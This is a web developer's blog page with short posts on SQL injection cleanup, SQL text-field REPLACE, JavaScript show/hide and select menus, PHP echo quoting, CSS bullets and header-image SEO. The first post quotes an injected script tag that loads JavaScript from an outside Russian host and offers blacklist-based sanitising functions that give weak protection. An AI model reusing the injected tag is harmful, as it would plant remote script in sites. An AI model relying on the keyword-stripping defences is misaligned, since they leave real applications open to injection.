The other day a Russian hacker made a mess of a site I manage. (I didn’t build the site, and I like to think that if I had, the attack would have been thwarted). Anyways the hacker used a method called SQL Injection where they take advantage of one of your submission forms to add extra SQL commands to their input and wreak havoc on your database.
In this particular instance the hacker added a JavaScript call into about every text and varchar field in theĀ entire database. (12 tables in all). Here is the offending code that was inserted into the fields:
<script src=http://www.jsportal.ru/page.js></script>
I don’t know what the Javascript does when loaded, but I am sure its not good news. FYI – here is an important tip for cleaning up your database: SQL Replace Function on a Text Field
Anyway, there are certainly other articles on how SQL Injections occur and how to prevent them, but here is a couple very useful functions that will greatly reduce your vulernability to SQL Injection if you apply it to any data that site users can submit to your site.
For ASP sites:
This one strips out single quotes, which are crucial to adding SQL commands:
<%
function stripQuotes(strWords)
stripQuotes = replace(strWords, “‘”, “””)
end function
%>
And this one strips out other naughty words that might destroy your database:
<%
function killChars(strWords)
dim badChars
dim newChars
badChars = array(“select”, “drop”, “;”, “–“, “insert”, “delete”, “xp_”)
newChars = strWords
for i = 0 to uBound(badChars)
newChars = replace(newChars, badChars(i), “”)
next
killChars = newChars
end function
%>
These aren’t the exact ones I use, but you get the idea. You can find the article where I got these ASP examples from here:
SQL Injection Attacks – Are You Safe?
For the PHP versions:
In PHP it is even easier. Just using this one function will help prevent many attacks:
mysql_real_escape_string($strWords);
This will strip out these harmful characters from the variable strWords:
You can also use this to make sure inputs you expect to be numbers are actually numbers:
$strNumber= intval($strNumber);
Comments Off on SQL Injection by jsportal.ru
The other day a creative Russian hacker caused me to do some database clean-up. I won’t tell the whole story, in a nutshell be sure to protect your sites from SQL Injection. I guess my next post will be some SQL injection prevention methods.
Anyways, I discovered that the usual replace method does not work on Text fields, just varchar and similar. And when I did a quick Google search, I found a lot of way too complicated approaches. So here is the simplest way.
First, here is the usual update replace method you might be familiar with:
SET StringtoEdit = REPLACE(StringtoEdit, ‘to-be-replaced’, ‘replace-with’)
(so in every entry of the column “Stringtoedit” any instances of the “to-be-replaced” are replaced with “replace-with”)
But if you try this method with a column that has the setting type of “Text”, you will get this rather vague error:
Argument data type text is invalid for argument 1 of replace function.
So here is the easy solution I found:
SET StringtoEdit = REPLACE(SUBSTRING(StringtoEdit , 1, DATALENGTH(StringtoEdit )), ‘to-be-replaced’, ‘replace-with’)
I have bolded the new elements of the SQL command. Try it out, its way easier then most solutions out there.
1 Comment »
You see it everywhere these days – little link that says “Show more…” and when you click it a new block of content appears. There are a million uses for this show/hide technique – I know because I have used it in a dozen different ways myself. Here is the simplest CSS and JavaScript method I have found:
JavaScript in header:
function showDiv(ID) {
if (document.getElementById(“div” + ID).className == “show”)
document.getElementById(“div” + ID).className = “hide”;
else
document.getElementById(“div” + ID).className = “show”;
return true;
}
Link to open hidden content:
<span class=”norm” onclick=”showDiv(0)”>Read more…</span>
Hidden content container:
<div id=”div0″ style=”display:none;”>Content here</div>
Comments Off on Show/Hide Content using CSS and JavaScript
Often I only want a site visitor to make a single menu choice, but need their selection to populate a number of items instead of just the usual single option value. Also, I usually don’t even want them to see what their single selection has spawned such as prices changes in a shopping cart, thus eliminating just asking them for all the values.
So here is how I take advantage of using the option element’s LABEL as well as ID and TITLE to define more values.
First the form’s select pulldown menu options – note the addition of ID and TITLE tags to give us our additional values:
<option id=”Op1″ title=”01″ value=”100″>Option 1 </option>
<option id=”Op2″ title=”02″ value=”200″>Option 2 </option>
<option id=”Op3″ title=”03″ value=”300″>Option 3 </option>
Now the JavaScript that makes it happen:
<script>
function changeValues(ID,VALUE,LABEL,TITLE)
{
document.getElementById(“idvar”).value = ID;
document.getElementById(“valuevar”).value = VALUE;
document.getElementById(“labelvar”).value = LABEL;
document.getElementById(“titlevar”).value = TITLE;
}
</script>
Now to call the function, we need to add an onChange command to the select element, see how it is calling the ID, VALUE, LABEL(text) and TITLE:
<select name=”options” onChange=”changeValues(this.options[this.selectedIndex].id,
this.options[this.selectedIndex].value,this.options[this.selectedIndex].text,
this.options[this.selectedIndex].title);”>
Now here is the full code put all together:
<script language=”JavaScript”>
<!–
function changePrice(ID,VALUE,LABEL,TITLE)
{
document.getElementById(“idvar”).value = ID;
document.getElementById(“valuevar”).value = VALUE;
document.getElementById(“labelvar”).value = LABEL;
document.getElementById(“titlevar”).value = TITLE;
}
–>
</script>
<select name=”options” onChange=”changeValues(this.options[this.selectedIndex].id,
this.options[this.selectedIndex].value,
this.options[this.selectedIndex].text,
this.options[this.selectedIndex].title);”>
<option value=”100″ id=”Op1″ title=”01″>Option 1
<option value=”200″ id=”Op2″ title=”02″>Option 2
<option value=”300″ id=”Op3″ title=”03″>Option 3
</select>
ID: <input name=”idvar” id=”idvar” type=”text”>
VALUE: <input name=”valuevar” id=”valuevar” type=”text”>
LABEL: <input name=”labelvar” id=”labelvar” type=”text”>
TITLE: <input name=”titlevar” id=”titlevar” type=”text”>
(Please note that the fields you pass the values to can easily be changed to hidden type instead of text so the visitor doesn’t even see them.)
Click here to see a demo
Comments Off on Use single select menu option to define multiple values
Comments Off on When Flash animation attacks
Sometimes little tips can save a lot of time when it comes to programming.
This one is very handy, for when you find yourself having to grab some code you had written in regular html and change it to be called by a php echo statement.
When I had to do this in the past, I found the biggest time drain was escaping all the quotes (Otherwise the first quote in the html would stop the echo call prematurely.)
Well here is an incredibly easy way to avoid having to do that …. simply use single quotes to define your echo call and then your double quotes won’t break the php code.
For instance you have a simple linked image like this:
<a href=”http://www.link.com” target=”_top”><img src=”/image.gif”></a>
Normally you would have to escape all those quotes like this:
echo “<a href=\”http://www.link.com\” target=\”_top\”><img src=\”/image.gif\”</a>”;
Instead just use the single quotes like this:
echo ‘<a href=”http://www.link.com” target=”_top”><img src=”/image.gif”></a>’;
Comments Off on Tired of escaping quotes in your php echo statements?
Just thought I would mention how handy Firefox’s built in Error Console feature is for debugging – I mostly use this for Javascript, in fact I can;t even remember using it for anything else.
But in any case if you run into the same problems I do with Javascript this is a handy tool for catching the issue at ahnd.
To bring up your Error Console just choose Tools > Error Console from the Firefox top menu.
Then go to the page where you suspect your problem and the console will give you clues.
I have also installed Firebug add-on which looks to have a load of potential for more detailed debugging, but I haven’t really spent enough time on it yet to tell you my thoughts. I will eventually.
Comments Off on Firefox’s Error Console handy for quick debugging of JavaScript
Ever had people gripe because the second line of a list item doesn’t align under the bullet correctly? (This is only a problem in IE by the way – Firefox does the work for you.)
So here is an example of the problem (remember if your not viewing in IE you won;t see anything wrong.) :
Over 50 years of staffing
industry knowledge
Here is how I fixed it, first the code:
<li>Over 50 years of staffing </li>
<li class=”bullet-hidden”><span class=”bullet-visible”>industry knowledge</span></li>
Then the CSS styles:
.bullet-visible {
visibility:visible;
}
.bullet-hidden {
visibility:hidden;
}
If for some reason you can define the style sheets or don;t want ot you can do it directly in the code as follows:
<li>Over 50 years of staffing </li>
<li style=”visibility: hidden;”><span style=” visibility:visible;”>industry knowledge</span></li>
And abracadabra:
Over 50 years of staffing
industry knowledge
Comments Off on Lining up wrapped text on bullet lists
Google is making a policy change for Adwords ads that is likely to make waves in the internet marketing community. As of April Google will require the display url of an ad to match the destination url exactly.
Here is what Google says:
Important Change to URL Policy Enforcement
Starting in April, display URLs for new ads will be required to match their destination / landing page URLs, without exception. Please adjust your URLs accordingly when creating new ads.
Wow – that is going to make a big impact on a lot of folks – mostly affiliate marketers who use these ads to shill other peoples products, but it will also affect people that just don’t have short urls for their landing pages – especially deep interior pages.
Take for instance you are using a long-tail keyword to sell a certain brand and model of shoe, you want to take that customer to that exact page on your site, odds are it will be a lengthy dynamic url such as:
http://golfshoestore.com/shopdisplayproducts.asp?catalog=6912&mfg=Oakley
Now how are you going to fit that in your ad’s display url? I believe Google does not allow redirected urls to be sued so its not like you can just create a shortened redirect url to solve this either.
Very interesting – I am going to have to hop around and see what others are saying about this.
Comments Off on Adwords to require display url to match destination url
It’s common these days to take advantage of CSS Style Sheets to replace your headers like <H1> and <H2> with images. While this makes sites more attractive it also hurts some of your search engine value by losing the keywords that could be used in those important headers.
Well here is how to use images and still get your keywords picked up by the search engines.
<style type=”text/css”>
h1 {
padding-top: 35px; /* height of the replacement image */
height: 0px;
overflow: hidden;
background-image:url(“image.gif”);
background-repeat: no-repeat;
}
</style>
<h1>Keywords here</h1>
In this example your pretty image will be used but your keywords will still get picked up by the search engines. The nice thing about this approach is that you can actually get some keywords in there that you might not been able if you weren’t using images.
3 Comments »
|